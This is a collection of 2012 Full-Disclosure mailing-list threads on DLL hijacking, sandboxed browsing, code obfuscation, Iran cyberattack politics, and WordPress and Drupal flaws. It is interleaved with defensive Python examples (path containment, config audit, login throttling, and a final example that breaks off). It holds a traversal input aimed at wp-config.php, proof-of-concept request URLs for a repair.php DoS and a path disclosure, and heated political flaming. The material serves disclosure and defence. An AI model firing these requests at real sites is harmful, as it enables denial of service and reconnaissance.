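    # "<base>-backup/..." as if it were inside "<base>".
    if os.path.commonpath([base, candidate]) != base:
        raise PathEscape(requested)
    if os.path.splitext(candidate)[1].lower() not in allowed_ext:
        raise ValueError("extension not editable")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(requested)
    return candidate


def build_demo_tree():
    """Constructed WordPress-like layout; returns (site_root, editor_dir)."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="wp-demo-"))
    editor = os.path.join(root, "wp-content", "plugins", "demo-plugin",
                          "admin", "editor")
    backup = editor + "-backup"          # sibling sharing the string prefix
    os.makedirs(editor)
    os.makedirs(backup)
    files = {
        os.path.join(root, "wp-config.php"): "<?php /* constructed secret */",
        os.path.join(editor, "page.html"): "<p>editable</p>",
        os.path.join(backup, "old.html"): "<p>not editable</p>",
    }
    for path, text in files.items():
        with open(path, "w") as fh:
            fh.write(text)
    try:
        # A link inside the editor directory that points at the config file.
        os.symlink(os.path.join(root, "wp-config.php"),
                   os.path.join(editor, "link.html"))
    except OSError:
        pass                              # platform without symlink support
    return root, editor


if __name__ == "__main__":
    site_root, editor_dir = build_demo_tree()
    requests = ["page.html", "../../../../../wp-config.php",
                "../editor-backup/old.html", "link.html"]
    for name in requests:
        try:
            print(name, "->", resolve_editable(editor_dir, name))
        except (ValueError, OSError) as exc:
            print(name, "-> rejected:", type(exc).__name__)
```

The containment test runs on the resolved path, so the symlink and the absolute-path variants are rejected by the same check as the `../` form.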
Re: [Full-disclosure] DLL Hijacking Against Installers In Browser Download Folders for Phish and Profit
I've got two concerns about this: 1. Either way you put it, I can't see how one can make a convincing argument out of downloading a DLL file. Asking laymen, they'd ask what's a dll for? weren't updates done with exe/msi/etc? why's it got that funny icon? 2. I'm a bit curious about your choice of code, and why you commented out exit(0); (what's the point anyway?) Cheers, Chris.

On Mon, Aug 13, 2012 at 7:19 PM, Gynvael Coldwind gynv...@coldwind.pl wrote: Well, what can I say - your write up is accurate. Though last time I've seen it, around 5 years ago, it was still called DLL spoofing and not DLL hijacking, and was one of the arguments why carpet bombing (automatic download) in Safari/Chrome must be fixed :) E.g. http://gynvael.coldwind.pl/?id=55 -- gynvael.coldwind//vx
Re: [Full-disclosure] sandboxed browsing
I use Internet Explorer 6 on Windows XP, obviously! On a more serious note, I doubt there's a safer alternative, except maybe not going there in the first place (or just wget-ing it instead).

On Wed, Aug 1, 2012 at 1:38 AM, Kyle Creyts kyle.cre...@gmail.com wrote: Who uses something other than a browser in a virtual machine to follow suspicious/possibly malicious links? If you do, what do you use, and how did you choose it?
Re: [Full-disclosure] sandboxed browsing
Uhm, there's countless ways to download a file through HTTP on Windows. To be honest, I don't trust sandboxie at all. I think, and I'm sure many agree with me on this one, a VM would be much better than sandboxie at this point. That said, I suppose there is still a chance of malware getting over your VM OS and infect your main one through the network, or the malware to be able to somehow escape your VM into the host. Either way, I think the best bet would be wget or similar.

On Wed, Aug 1, 2012 at 3:14 PM, Andreas mailinglis...@lanworkx.org wrote: well, for windummys there's http://www.sandboxie.com/ or even better: linux

Quoting Kyle Creyts kyle.cre...@gmail.com: Who uses something other than a browser in a virtual machine to follow suspicious/possibly malicious links? If you do, what do you use, and how did you choose it?
Re: [Full-disclosure] A modest proposal
For what it's worth, I wrote a system in the past whose code changed on each generation. I did it mostly as an exercise, but it seemed to work well. It had two different layers; an obfuscation layer and a code modifier layer. Obfuscation worked like you would expect today; substituting function/variable names etc. The second layer actually changed the code with functionally equivalents (as Valdis mentioned). However, I disagree with Valdis' points about the opcodes. Seems his interest lies in fixing a potential issue. I beg to differ, this concept isn't about fixing existing code, but rather leave it as is (with the existing bugs). From a development perspective, if a bug comes up in the end system, it will be much harder to debug since function names etc won't correspond with the original code. You might want to put some sort of logging mechanism to figure out these bugs, but it defeats the purpose of hiding code in the first place. My two cents.

On Fri, Jul 20, 2012 at 9:48 AM, Thor t...@hammerofgod.com wrote: There's no need to insult him like that. The idea itself may be a bit lacking in overall effectiveness, but it certainly isn't childish. t

On Jul 19, 2012, at 11:55 PM, Memory Vandal wrote:

On Fri, Jul 20, 2012 at 6:38 AM, Glenn and Mary Everhart everh...@gce.com wrote: Hello, FD... A thought occurred to me: Why not use the same kind of polymorphism and software metamorphism that is used by malware writers as a protective measure?

So you want to make a Batman malware? I would say it's a nice thought but still childish. MemoryVandal
Re: [Full-disclosure] A modest proposal
Wow, how short sighted. So you really think that obfuscating code is a good excuse to escape reviewing of bad code? With all that trouble, you could just write it correctly from scratch (or give it more time for testing). But at this point, I think everyone is getting their own deal out of this. The original idea does not work for each and every case, and it definitely fails badly in some specific cases...this however, does not discredit it at all. On the other hand, if all you really care about is trolling...well, that's another different story.

On Fri, Jul 20, 2012 at 4:01 AM, Bzzz lazyvi...@gmx.com wrote:

On Thu, 19 Jul 2012 21:08:47 -0400 Glenn and Mary Everhart everh...@gce.com wrote: If you have a piece of code that you don't want malware to be able to inspect, that might perhaps have some secrets in it or that you want not to be trivial to have some other code patch, why not arrange for that code to be different in form (but the same in function) with every copy?

It isn't very realistic because wherever you put the code, in whatever native form, you first have to decode it to RAM for execution; and if this code is a piece of crap, it'll stay a piece of crap. Furthermore, obfuscation can talk to you when you're used to review tons of code (haaa, apple][ nibble counts and other protections, where did you go?:), and sensibly slows down programs responsiveness. The base of the problem isn't obfuscation but producing good and tested code, AND reacting fast when a flaw is discovered. This is what most of open-source coders fight to do and what big corps strive to avoid. In this matter, everybody's here knows that threatening these corpos of a full disclosure is the only way to go, because they're like kids that won't grow up and seek the least effort possible max benefit way - in a word, they're irresponsible. JY

-- lily34 were made one for each other lily34 we'll marry lily34 we'll have many children EthanQix :/ lily34 like Roméo and Juliette :D EthanQix hmmm you apparently didn't finished the book. lily34 ?
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
All this talk about a lot of arguments to syscalls reminded me of `ls` and that's just the beginning.. Let's be honest, no matter the amount of standardization (or plain planning) you put in, there's always room for complications. In what I've seen, the only exception here, is a dozen or so small hobbyist OSes.

On Mon, Jun 11, 2012 at 1:58 AM, Dan Cross cro...@gmail.com wrote:

On Sun, Jun 10, 2012 at 7:22 PM, Benjamin Kreuter ben.kreu...@gmail.com wrote:

I am a bit surprised by the direction of this conversation and I have been waiting for someone to say the obvious in regards to protecting yourself from .gov malware, it really is quite simple if you think about it. Stuxnet, duqu, flame, etc.. all only run on windows platforms. If the people you are protecting are concerned about that kind of malware (and they should be) it would be a great time to tell them about GNU/Linux, BSD, etc..

Which would do little to protect anyone. Do you really think that GNU/Linux would be a more difficult target for the NSA (or whichever agencies were responsible -- I would guess the NSA, but there may be others)? GNU/Linux machines are compromised by criminals all the time, and the majority of people would not be willing to put in the effort needed to keep their system secure. There are probably a bunch of remote exploits in the Linux kernel, in Firefox and Chrome, in OpenSSL and NSS, in Ghostscript, and in any of the thousands of other packages that will be installed on a typical GNU/Linux system. There is no magic bullet here. Security is not about running the right OS, it is about running your OS the right way (and more). Telling people that using GNU/Linux will make them safe is silly.

Fundamentally I agree with you, security isn't about running the right OS, etc, we should acknowledge that not all operating systems are the same. Windows is fabulously complex, with a really large number of system calls, many of which take a large number of arguments that in turn change the semantics of the call greatly. Together, these represent a very large surface area for potential attacks. In turn, many of the Unix variants are simpler; they may not be any more secure, but at a minimum, they have less attack surface area. Of course, it's been my impression over the last couple of decades that they're trying as hard as they can to fill the gap. To put it in military terms, the Unix variants have traditionally had more surfaces and fewer gaps than Windows. Anyway, this isn't to say that Unix or some variant is inherently more secure, but all other things being equal, I'd rather put my money on the simpler thing, since simpler is often easier to get right. Whether that's really the case or not is another matter; I simply wanted to point out that there are other arguments beside the flawed, security through obscurity that may come into play when deciding between operating systems with respect to security. - Dan C.
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
Yes, let's just forget Iran would strike any country against its religious views, especially Israel. Then again, we can take Iran's word for it - they won't attack anyone unless they really had to.

On Sat, Jun 9, 2012 at 12:08 PM, John Doe jd731841...@gmail.com wrote:

On Fri, Jun 8, 2012 at 1:58 PM, Laurelai laure...@oneechan.org wrote: And that brings us back to what are we going to do about the US Gov laying down in the same mud as the bad guys

Good and bad are just points of view, mostly of whether YOU benefit or not.

Ian Hayes cthulhucall...@gmail.com wrote: There are those out there in power who only know the language of brute, naked force The murder of civilians is certainly a terrible crime, but that and the release of some malware that breaks centrifuges is certainly better than other options.

Pre-emption of potential, predicted or foreseen violence with violence does not justify the violence or make it right. The right option would be to respect their rights and leave them alone, but strategy game-theory playing americans won't allow that, as Iran is the weak kid on the block and the fatsos want him to give up his candy. Not that the fatso really needs the candy, it's more of a habit of bullying. USA hasn't declared war on Iran. Congress has not authorized acts of war against Iran, has it? -- If Obama has, he is acting as a rogue agent of USA, a terrorist - if you will, hell bent on killing civilians with his assassination lists, cyber weapons and drones. As such, he should be held liable for any damages, just like americans would hold any terrorist liable for attacking them with similar means and weapons. How would Obama feel if Iran sent a drone to bomb and kill his kids and family at a kindergarten, just because they thought he might be there? Would it not be just as justified a killing as his strikes have been? It might even pre-empt some of his drone bombings or cyber attacks in the future!

Laurelai wrote: I don't see how Iran developing nuclear power is a threat, I'm sorry to me this just seems like more fear mongering.

musntl...@gmail.com wrote: And is this how you fail. There is no problem is in developing nuclear POWER there is problem when you is weaponize it.

Problem is not weapons either. It is game theoretic positioning. Bullies who let the weak and robbed get guns end up regretting it when the weak can defend themselves and can no longer be robbed and bullied. This is what bullies don't like. This is why americans and USA whine about Iran, because they bully Iran for its oil and gas resources, - the candy. I think the major problem here is that USA, and indeed some americans, are unwilling to give others the same benefits and equal rights, which they enjoy themselves on the free markets of the world. To which they have agreed. Iran is a signatory of the Nuclear non-Proliferation Treaty and as such has every right to use and to develop nuclear power to peaceful purposes. Indeed, USA was the one supplying them with 18 fast breeder nuclear reactors not so very long ago. Iran should sue USA and Obama for terrorism on any international, civil and class action courts for damages to any cyber menaces they've been unleashed upon by Obama. There is no justification for their illegal attacks against Iran. If Obama has authorized these acts of war, then he should be held liable for any civilian or corporate damages as well as charged with terrorism. I would imagine that in these cases the damages run easily in the billions. This is the right solution for cyber terrorism. Take them to court!
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
What's the real problem Laurelai? If the US abruptly vanished, there will be another country taking its place as the global player. The thing is, I can't imagine another country doing a better job than the US, not because the US is a walking saint, but because the rest of them are no better. Back to the subject of the US playing dirty, who gives a shit? Security experts of all shades have been doing it. Now that the US is taking your place you're worried?

On Sat, Jun 9, 2012 at 5:01 AM, Laurelai laure...@oneechan.org wrote:

On 6/8/12 9:56 PM, Jason Hellenthal wrote: Shit, I'll give the NSA a shell on any system... if it means achieving a greater goal. Whether its wrong or not... let the bots decide who is the better player as long as it brings the US into a primary position of power.

On Wed, Jun 06, 2012 at 11:22:32PM -0400, Laurelai wrote:

On 6/6/12 2:23 PM, Peter Dawson wrote: haha..da retrun of da farewell dossier !!

On Wed, Jun 6, 2012 at 2:21 PM, coderman coder...@gmail.com wrote:

On Wed, Jun 6, 2012 at 11:16 AM, coderman coder...@gmail.com wrote: ... uncle sam has been up in yer SCADA for two decades.

three decades; too early for maths!

Guys can we focus on the fact that the US Government is en masse accessing computer systems without due process, and trying to prosecute the people who made this known to the public.

Here we have a real life example of someone who is a part of the problem.
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
There are so many flaws about your argument, I don't even know where to start. Then again, most arguments were pointless, so instead, I'll iterate my previous one; all this sensationalism about the US is just bullshit. Other countries are doing this, and kids at home even help out. Heck, I'm more concerned with how modern day kids are so gullible into thinking they're doing something great by bringing down a website.

On Sat, Jun 9, 2012 at 2:55 PM, John Doe jd731841...@gmail.com wrote: I'm sure the Nazis were thinking alike. The jews kept whining, but then again, they were the arab terrorists of the time.. And now we have americans wondering why the arabs won't go into the ovens without whining. More to the topic, I'd hope USA would LEAVE THE CIVILIANS OUT OF THEIR FUCKING WARS, and honor the treaties thereof, like they should. And I don't mean the verbal shit how we don't torture or we don't kill civilians but I mean the actions themselves. Verbally lying about not torturing does not equate to honoring the treaty against torture, for example. This, americans just don't seem to understand. The treaties obligate and bind all americans to honor them. And not just verbally, but in your deeds as well. And this includes cyber wars. They just work to disrupt the internet even more and it does not do good to economy or the productivity of people. Internet and computers working without problems create bigger economic growth than USA disrupting them with their cyber weapons and wars.

On Sat, Jun 9, 2012 at 3:31 PM, Christian Sciberras uuf6...@gmail.com wrote: What's the real problem Laurelai? If the US abruptly vanished, there will be another country taking its place as the global player. The thing is, I can't imagine another country doing a better job than the US, not because the US is a walking saint, but because the rest of them are no better. Back to the subject of the US playing dirty, who gives a shit? Security experts of all shades have been doing it. Now that the US is taking your place you're worried?

On Sat, Jun 9, 2012 at 5:01 AM, Laurelai laure...@oneechan.org wrote:

On 6/8/12 9:56 PM, Jason Hellenthal wrote: Shit, I'll give the NSA a shell on any system... if it means achieving a greater goal. Whether its wrong or not... let the bots decide who is the better player as long as it brings the US into a primary position of power.

On Wed, Jun 06, 2012 at 11:22:32PM -0400, Laurelai wrote:

On 6/6/12 2:23 PM, Peter Dawson wrote: haha..da retrun of da farewell dossier !!

On Wed, Jun 6, 2012 at 2:21 PM, coderman coder...@gmail.com wrote:

On Wed, Jun 6, 2012 at 11:16 AM, coderman coder...@gmail.com wrote: ... uncle sam has been up in yer SCADA for two decades.

three decades; too early for maths!

Guys can we focus on the fact that the US Government is en masse accessing computer systems without due process, and trying to prosecute the people who made this known to the public.

Here we have a real life example of someone who is a part of the problem.
Re: [Full-disclosure] DoS vulnerability in WordPress
Honestly, you'll be doing a favour to everyone in the universe and yourself if you learned (to write) some proper English. On Fri, Apr 20, 2012 at 10:50 PM, MustLive mustl...@websecurity.com.uawrote: Hello Kurt! First off all, WordPress developers lay that they made automatic database repair against the vulnerability, which allowed two attacks - DoS and full site takeover (at presence of the installer). Since WP 2.9 (in December 2009) it's still not automatic, so still all versions of WordPress are vulnerable to Tables Corruption Attacks, which I've described in May 2009 (turning 'WP_ALLOW_REPAIR' will not make it automatic). Second, such functionality as in repair.php, which overloads the DBMS (and so every site on the server which uses this DBMS), must be under authorization (and not to every logged in user, but admin only). WP developers haven't did it, but they decided to make such silly method of protection against attacks on this functionality. By default it's off, so admins and their sites protected from attacks on it (and have no advantage from this security functionality). When admins will decide to turn it on, like when the problem with DB occurs or just for testing of this functionality or because they believe in developers words that it's automatic database optimization (including repairing of the tables), so for reliability they turned it on, they will receive new vulnerability at their sites. Admins could left this option on for different reasons: forgot to turn off, was busy and decided to turn it off later, have tables crash all the time, so it's easier to turn it on one time and other reasons. For example, besides WordPress I've wrote about analogical vulnerabilities in IBP 1, 2, 3 (which could lead to DoS). And since IPB 2 there is a functionality - not protection against tables crashes, nor automatic database optimization, but just functionality in admin panel for repairing DB - which can be used to quickly recover forum after tables crashes. 
It's accessible only to authorized admins - how it should be made. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Kurt Seifried kseifr...@redhat.com To: MustLive mustl...@websecurity.com.ua Cc: submissi...@packetstormsecurity.org; full-disclosure@lists.grok.org.uk Sent: Monday, April 16, 2012 10:11 PM Subject: Re: [Full-disclosure] DoS vulnerability in WordPress -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 04/15/2012 02:55 PM, MustLive wrote: DoS (WASC-10): By constantly sending requests to script http://site/wp-admin/maint/repair.php (functions Repair Database and Repair and Optimize Database) it's possible to create overload at the site (and the whole server). And the more data in site's DB, the more load from every request. http://site/wp-admin/maint/repair.php?repair=1_wpnonce=a4ca36d5ff http://site/wp-admin/maint/repair.php?repair=2_wpnonce=a4ca36d5ff The attack will work at turned on WP_ALLOW_REPAIR in wp-config.php. Protection against CSRF (tokens) is bypassing, because for using of this functionality the authorization isn't required. So it's possible to get _wpnonce remotely and to conduct DoS attack. This appears to be intended functionality, by default I get: To allow use of this page to automatically repair database problems, please add the following line to your wp-config.php file. Once this line is added to your config, reload this page. define('WP_ALLOW_REPAIR', true); So either an admin has to specifically configure this to allow it anonymously, or exploitation requires administrative access. I don't see any trust boundary being violated here. 
-- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

___ Full-Disclosure - We believe in it. Charter:
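Kurt's point in the thread above is that repair.php only answers once an administrator has defined WP_ALLOW_REPAIR in wp-config.php. The Python check below is an added example, not part of the original thread or of WordPress: it reports an active define while ignoring commented-out copies and copies inside string literals. The function name and sample configs are constructed, and a falsy value is still reported because the thread does not say how repair.php treats one.

```python
import re

# Tokenizer for the small subset of PHP needed here. Comments and string
# literals are consumed whole, so a define() inside either is never matched.
TOKEN_RE = re.compile(r"""
    (?P<comment> //[^\n]* | \#[^\n]* | /\*.*?\*/ )
  | (?P<string>  '(?:\\.|[^'\\])*' | "(?:\\.|[^"\\])*" )
  | (?P<word>    [A-Za-z_][A-Za-z0-9_]* | \d+ )
  | (?P<punct>   [(),;] )
""", re.S | re.X)

# PHP literals that evaluate to false.
FALSY = {"false", "0", "null", "''", '""', "'0'", '"0"'}


def audit_wp_config(src):
    """Return details of the first active WP_ALLOW_REPAIR define, or None.

    PHP keeps the first definition of a constant, so the first match is the
    one that takes effect. Function names are case-insensitive in PHP,
    constant names are not.
    """
    toks = [m for m in TOKEN_RE.finditer(src) if m.lastgroup != "comment"]
    for i in range(len(toks) - 4):
        fn, lpar, name, comma, value = toks[i:i + 5]
        if (fn.lastgroup == "word" and fn.group().lower() == "define"
                and lpar.group() == "("
                and name.lastgroup == "string"
                and name.group()[1:-1] == "WP_ALLOW_REPAIR"
                and comma.group() == ","):
            literal = value.group()
            return {
                "line": src.count("\n", 0, fn.start()) + 1,
                "value": literal,
                "truthy": literal.lower() not in FALSY,
            }
    return None


# Constructed sample configs (not taken from any real site).
SAMPLE_OFF = """<?php
// define('WP_ALLOW_REPAIR', true);
/* define('WP_ALLOW_REPAIR', true); */
define('DB_NAME', 'wp'); # define('WP_ALLOW_REPAIR', true);
$note = "see // define('WP_ALLOW_REPAIR', true) in the docs";
"""

SAMPLE_ON = """<?php
/* maintenance */
Define( "WP_ALLOW_REPAIR" , TRUE );
"""

SAMPLE_FALSE = """<?php
define('WP_ALLOW_REPAIR', false);
"""

if __name__ == "__main__":
    for label, cfg in (("off", SAMPLE_OFF), ("on", SAMPLE_ON), ("false", SAMPLE_FALSE)):
        print(label, audit_wp_config(cfg))
```

A non-None result means the repair page should be treated as reachable until the define is removed again, which matches the "forgot to turn it off" case MustLive raises.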
Re: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw
So, it seems it dawned on everyone that current computer models are fundamentally flawed. The protection we're trying to add is, at this point, one huge hack attempt to get things right. Do I have a specific solution? No. But I do think rethinking the wheel might be worthwhile. This would include forgetting POSIX for a minute and think what could be improved without relying on religious zeal. Yes, I know it's hard, but it's for the betterment of humanity! I hope...

Chris.

On Thu, Mar 29, 2012 at 3:20 AM, b b...@advisoryalerts.com wrote:

So I guess what I am hearing from you and the other members of the list is that this problem can pretty much only be solved to provide complete security* except from physical attacks by having an operating system that is mathematically proven to do x, y, and z functions and only x, y, and z functions such that userland code could not ever get system level access to read arbitrary points in memory; and the operating system would have to provide a facility to userland programs for secure credential storage and the OS would enforce only certain programs (verifying using cryptographical checks that said program is indeed said program) would be able to obtain those credentials (and only in memory); and in addition to all of that the decryption key for the secure credential storage mechanism's database would never be stored on disk and would have to be entered by an administrator on system bootup?

* I realize some of you may gawk at the use of that term, but I'm not sure what else to say there for complete security.

-B

-----Original Message-----
From: Thor (Hammer of God) [mailto:t...@hammerofgod.com]
Sent: Wednesday, March 28, 2012 11:30 AM
To: b; full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw

You've well-articulated a problem most (if not all) of the implementations I've seen just dance over. The application accomplishes the encryption requirements stipulated by policy or regulation, but the key is easily available to the application and of course to attackers.

I have no idea what mitigation techniques are available for PHP, but in .NET/Win applications there are a couple of first step attempts to at least address the problem. First you've got DPAPI, which in its simplest form is an API that allows the application to encrypt/decrypt data by way of keys stored in the system certificate store which is protected by a different set of credentials. The attacker would have to get system to get to the keys. Of course, if the attacker could alter code as you've outlined, then they could very well just use the API to decrypt data without worrying about getting the keys themselves.

The problem with DPAPI is that it is system-based. The data encrypted by that system can only be decrypted by that system. That won't work in distributed environments, and it can be problematic in system failure scenarios. To get past single-machine issues, there is another method called DKM, which as the name infers is a distributed key management system based on AD and the machines' membership in appropriate groups given access to the keys. So in a similar fashion, keys are protected by secondary credentials at the machine level. Again, this requires an attacker to gain system access to get the keys, but again, gives an attacker with file-level access where code can be changed access to the procedure calls to get the data if they have to.

It is a very difficult problem to solve, but it all comes down to risk management. If you are protecting against off-line attacks or attacks from other systems, DPAPI or DKM will definitely help. If you are protecting against attacks where SYSTEM access is granted, it gets far more difficult (one may even say quite improbable) to protect the keys.

What I've been doing myself is a bit different, but it ultimately suffers from the same potential issues: As part of my TGP suite, I've extended functionality to WinMobile so that data encrypted on the PC can be exchanged and decrypted on the phone. It's pretty cool actually... to get around the key management issues, I wrote an API where the devices authenticate to, and use certificates to gain access to the encrypted keys on a centralized key store. On the phone, the calls are made each time keys are needed. On my web servers, the call is actually made on application startup, storing the keys in memory. At any time one becomes aware of some breach, you can cut off access to the keys. Not ideal of course, but it works.

I'm not worried about the BSOD scenario. The remote attacker would have to cause a BSOD, and then somehow access the dump. In production systems, the page files are typically kept on another drive (well, maybe not typically but that is up to the admins) in which case the dump won't exist. But to your point, I just looked at my
Re: [Full-disclosure] Brute Force vulnerability in WordPress
How do you propose fixing this vulnerability? Error: Just pick another username... we don't like the one you chose.

Brute force wouldn't work (would be infeasible) if wrong logins would take slightly longer to process (say, 2 to 5 seconds) as well as throttling login attempts. But again, this is a login issue, definitely NOT abuse of functionality by bruteforcing logins. Hell, I could bruteforce logins with a single google dork... there's no point protecting against the inevitable, especially when the protection is causing a huge disservice for absolutely no reason.

Chris.

On Wed, Mar 28, 2012 at 11:43 PM, MustLive mustl...@websecurity.com.ua wrote:

Hi Zach!

Yes, it's also a vulnerability. It's Abuse of Functionality, which allows to enumerate logins. And during 2008-2011 I've wrote about all existent Login enumerations and Login leakages in WordPress (including this one). And also in many other web applications.

Such vulnerabilities are also widespread like BF, but less than BF. I've found many web sites and web applications, where there was BF, but no Login enumerations or Login leakages. So they are less widespread, but also ignored by developers, even more than BF holes.

Knowing logins is vital for Brute Force attacks and if logins are hidden it's not just 50% more secure (as some developers like to say about 50% less secure with leaked logins), but it's make BF almost impossible. Because with unknowing logins it'll be needed to pick up passwords blindly (with using of common logins), which will be unsuccessful in 99% cases. But there are web applications where logins are not needed - it's webapps with only one password field (there were many such webapps in 90-s and first part of 2000-s) and with fixed login (which is the same as only one password field), like Adobe ColdFusion, about this and other holes I've wrote last year.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message -----
From: Zach C. fxc...@gmail.com
To: InterN0T Advisories advisor...@intern0t.net
Cc: MustLive mustl...@websecurity.com.ua ; full-disclosure@lists.grok.org.uk ; submissi...@packetstormsecurity.org
Sent: Monday, March 26, 2012 3:05 AM
Subject: Re: [Full-disclosure] Brute Force vulnerability in WordPress

He also considers it a vulnerability to tell a new user that the username they've picked out has been taken by another user.

On Sun, Mar 25, 2012 at 3:09 PM, InterN0T Advisories advisor...@intern0t.net wrote:

Same type of vulnerabilities exist in 99,999...% of all web applications including your website. Even if you can't bruteforce all the time, you can adjust it with timing, and e.g., proxies, different user-agents, etc., and then you have Timed Bruteforce Attacks which works on pretty much all websites. Did you also mention this 5-10 years ago on your web site about website security named websitesecurity.com.ua?

Also, when will you stop posting about: bruteforce/full path disclosure/locking actual users out/and other low priority vulnerabilities that exist in most web apps, and completely move on to vulnerabilities that matter? Seriously, anyone can find these vulnerabilities and the reason why anyone hasn't reported / disclosed / complained about them is because they exist in most apps and doesn't compromise the security of the end-user nor the website.

Will the next thing you disclose be about bruteforcing SSH because it by default doesn't lock users out? It's been like this for +10 or +20 years.

What I find funny is that either you:
A) Say a web app has a vulnerability because it doesn't lock the offending user out because of too many password tries, OR
B) Say a web app has a vulnerability because it does lock out the offending user because of too many password tries.

It's almost a contradiction and an endless evil circle. You can't have both, ever.

No offense intended of course.

Best regards,
MaXe

On Sun, 25 Mar 2012 23:45:33 +0300, MustLive mustl...@websecurity.com.ua wrote:

Hello list!

There are many vulnerabilities in WordPress which exist from version 2.0, or even from 1.x versions, and still not fixed. So I want to warn you about one of such holes. It's Brute Force vulnerability via XML-RPC functionality in WordPress.

Affected products:

Vulnerable are WordPress 3.3.1 and previous versions.

Details:

Brute Force (WASC-11): http://site/xmlrpc.php

In this functionality there is no protection against Brute Force attack. At sending of corresponding POST-requests it's possible to pick up password.

Note, that since WordPress 2.6 the XML-RPC functionality is turned off by default. WP developers did it due to vulnerabilities (such as SQL Injection and others), which were found in this functionality, i.e. not motivating it
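The delay-based throttling Christian describes in this thread, as an added Python example (not code from the thread or from WordPress). It keys the delay per account and per source, so rotating proxies do not help, and it caps the wait instead of locking anyone out, which is the conflict MaXe points at. The class name, the 15-minute window and the sample addresses are assumptions; the 2 to 5 second range comes from the message above.

```python
import time


class LoginThrottle:
    """Delay, never lock: each failure postpones the next evaluated attempt."""

    def __init__(self, base_delay=2.0, max_delay=5.0, window=900.0,
                 clock=time.monotonic):
        self.base_delay = base_delay    # wait after the first failure (seconds)
        self.max_delay = max_delay      # cap, so the real owner is never locked out
        self.window = window            # assumed: failures older than this are forgotten
        self.clock = clock
        self._state = {}                # key -> (consecutive failures, last failure time)

    @staticmethod
    def _keys(user, source):
        # Per-account key slows distributed guessing against one login;
        # per-source key slows one client walking through many logins.
        return (("acct", user.lower()), ("src", source))

    def _delay(self, failures):
        if failures == 0:
            return 0.0
        exponent = min(failures - 1, 16)        # bound the exponent
        return min(self.max_delay, self.base_delay * 2 ** exponent)

    def retry_after(self, user, source):
        """Seconds until an attempt for this account/source will be evaluated."""
        now, wait = self.clock(), 0.0
        for key in self._keys(user, source):
            failures, last = self._state.get(key, (0, 0.0))
            if failures and now - last <= self.window:
                wait = max(wait, last + self._delay(failures) - now)
        return wait

    def attempt(self, user, source, check):
        """check() verifies the credentials; it is not called while throttled."""
        if self.retry_after(user, source) > 0:
            return "throttled"
        now = self.clock()
        if check():
            # Only the account counter is cleared: a client must not be able
            # to reset its own source counter with one valid login.
            self._state.pop(("acct", user.lower()), None)
            return "ok"
        for key in self._keys(user, source):
            failures, last = self._state.get(key, (0, 0.0))
            if now - last > self.window:
                failures = 0
            self._state[key] = (failures + 1, now)
        return "denied"


class FakeClock:
    """Test clock so the example runs instantly."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


def simulate_guessing(seconds=60):
    """Constructed scenario: one wrong guess per second from rotating sources,
    then the account owner logs in from elsewhere one second after the run."""
    clock = FakeClock()
    throttle = LoginThrottle(clock=clock)
    evaluated = 0
    for t in range(seconds):
        clock.now = float(t)
        source = f"198.51.100.{t % 250}"        # documentation address range
        if throttle.attempt("admin", source, lambda: False) == "denied":
            evaluated += 1
    clock.now = float(seconds + 1)
    owner = throttle.attempt("admin", "203.0.113.7", lambda: True)
    return evaluated, owner


if __name__ == "__main__":
    print(simulate_guessing(60))
```

In the simulated minute only 13 of the 60 guesses are evaluated, and the owner's wait is bounded by `max_delay`.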
Re: [Full-disclosure] Drupal 7.x Search Module - Full Path Disclosure
It would take an incredible effort for today's powerful frameworks to simply typecast user input as required. Either that, or it's PHP's fault (as the Python people would say).

On Wed, Mar 14, 2012 at 3:46 PM, Ferenc Kovacs tyr...@gmail.com wrote:

On Wed, Mar 14, 2012 at 2:39 PM, Ursu Mihail mishka.u...@yahoo.com wrote:

Drupal 7.x Search Module - Full Path Disclosure

== Summary
Full path disclosure due to insufficient input validation in the search module.

== Description
Performing a search with the keys parameter set as an array, an error message shows the full path of the Drupal installation, leading to possible further attacks. For the error messages to be displayed, php.ini's display_errors must be On.
Authentication: Not Needed

== Mitigation
Correct input validation for the key parameters

== Exploit PoC
example.com/?q=search&keys[]=securitate.md

== Affected Versions
Versions 7 7.12 are affected. Not tested on 6.

== Credits
Ursu Mihail [ http://securitate.md ]

== Disclosure Timeline
Reported to vendor on 1 Mar 2012.
Response from vendor: Disclosure of the path is not considered a security risk. Drupal has a configuration setting which allows PHP warnings to be printed to the screen for debugging purposes... For production websites, it is a good idea to turn this off, and the messages will not be displayed.

== Comments
Unfortunately for them, many sites display errors in production.

==

___ Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

btw. that's a pretty common problem. I also reported a similar issue a while back about https://dev.twitter.com/search/apachesolr_search/api?page[]=123 it seems that the apachesolr_search drupal module is also vulnerable. :/
http://code.google.com/p/twitter-api/issues/detail?id=2271

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
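An added example, not from the thread or from Drupal: a Python check that mimics how PHP turns `name[]` parameters into arrays, so a reverse proxy rule or a log review can flag requests that send an array where a scalar such as `keys` or `page` is expected. It assumes the PoC's parameters are `q=search` and `keys[]`; the function names and the expected-scalar set are hypothetical.

```python
from urllib.parse import parse_qsl, urlsplit

# Hypothetical: parameters the application expects to be plain strings.
EXPECTED_SCALARS = {"q", "keys", "page"}


def php_param_shapes(query):
    """Return {name: 'scalar' | 'array'} the way PHP would populate $_GET.

    Simplification: only the name[...] convention is modelled; PHP's other
    name rewriting (dots and spaces to underscores) is left out.
    """
    shapes = {}
    # parse_qsl percent-decodes names, so keys%5B%5D=x is seen as keys[]
    # and cannot slip past a check that only looks for literal brackets.
    for name, _value in parse_qsl(query, keep_blank_values=True):
        base, bracket, rest = name.partition("[")
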